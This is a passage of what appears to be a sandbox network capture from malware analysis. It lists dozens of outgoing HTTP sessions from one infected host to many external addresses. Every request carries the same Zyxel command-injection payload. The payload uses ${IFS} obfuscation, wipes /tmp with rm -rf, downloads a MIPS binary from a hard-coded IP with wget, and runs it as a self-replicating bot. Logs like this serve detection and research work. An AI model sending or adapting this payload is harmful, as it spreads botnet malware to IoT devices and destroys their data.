                                        Mar 31, 2024 09:22:44.877449036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9049192.168.2.2342570189.37.255.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877500057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9050192.168.2.233935849.175.192.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877542019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9051192.168.2.235446494.54.77.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877609968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9052192.168.2.2339056145.32.192.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877657890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9053192.168.2.233402497.102.51.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877697945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9054192.168.2.2353944123.139.35.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877737045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9055192.168.2.2340420212.169.40.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877775908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9056192.168.2.23395462.249.8.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877825022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9057192.168.2.2355152115.153.118.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877875090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9058192.168.2.2337012131.121.29.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877926111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9059192.168.2.2354084165.93.68.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877959967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9060192.168.2.2348702146.15.249.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.877990961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9061192.168.2.2335300142.93.205.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878041983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9062192.168.2.233348838.22.83.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878087997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9063192.168.2.2354242180.63.223.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878135920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9064192.168.2.2349918192.236.205.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878185987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9065192.168.2.23362402.41.27.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878233910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9066192.168.2.2339204187.33.195.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878284931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9067192.168.2.2338904130.248.98.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878334045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9068192.168.2.2351620156.225.155.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878372908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9069192.168.2.2360086145.255.181.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878424883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9070192.168.2.2359758188.19.43.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878465891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9071192.168.2.2333536133.161.13.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878520012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9072192.168.2.234193054.40.149.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878565073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9073192.168.2.2356274185.115.40.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878609896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9074192.168.2.233365267.216.56.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878664017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9075192.168.2.2353226133.192.243.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878695011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9076192.168.2.2343840178.187.205.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878736973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9077192.168.2.2333384115.81.170.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878797054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9078192.168.2.2344174203.158.71.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878848076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9079192.168.2.2348100150.110.109.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878881931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9080192.168.2.235674459.10.217.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878926992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9081192.168.2.234670483.196.196.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.878974915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9082192.168.2.234443088.251.18.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879013062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9083192.168.2.2352880145.136.196.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879041910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9084192.168.2.235557485.123.2.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879098892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9085192.168.2.233400050.21.183.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879149914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9086192.168.2.2358074208.84.241.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879195929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9087192.168.2.2359480155.26.139.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879242897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9088192.168.2.2356392159.144.39.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879276991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9089192.168.2.235338232.0.177.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879314899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9090192.168.2.2333264132.49.105.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879359961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9091192.168.2.235824676.105.227.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879407883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9092192.168.2.2344400111.242.80.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879452944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9093192.168.2.235813662.253.178.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879494905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9094192.168.2.2355824202.63.217.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879550934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9095192.168.2.23453262.49.14.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879587889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9096192.168.2.233859852.124.44.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879633904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9097192.168.2.2354134204.244.10.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879687071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9098192.168.2.2345992158.59.124.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879718065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9099192.168.2.2342716171.204.165.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879770041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9100192.168.2.233870018.71.74.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879823923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9101192.168.2.2335702204.118.186.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879868984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9102192.168.2.23437269.205.223.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879920959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9103192.168.2.2335098140.97.66.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879966021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9104192.168.2.2347956152.70.121.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.879998922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9105192.168.2.233771836.54.215.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880036116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9106192.168.2.2344754179.7.13.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880094051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9107192.168.2.2337284129.43.1.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880141973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9108192.168.2.234953619.231.144.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880167961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9109192.168.2.2337520140.253.40.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880233049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9110192.168.2.2348376134.207.12.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880269051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9111192.168.2.2346142132.37.211.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880326033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9112192.168.2.2347186104.85.134.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880358934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9113192.168.2.2347654109.48.226.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880400896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9114192.168.2.2349128119.27.80.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880446911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9115192.168.2.2347326182.31.63.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880497932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9116192.168.2.2341442186.249.118.92443
                                        TimestampBytes transferredDirectionData
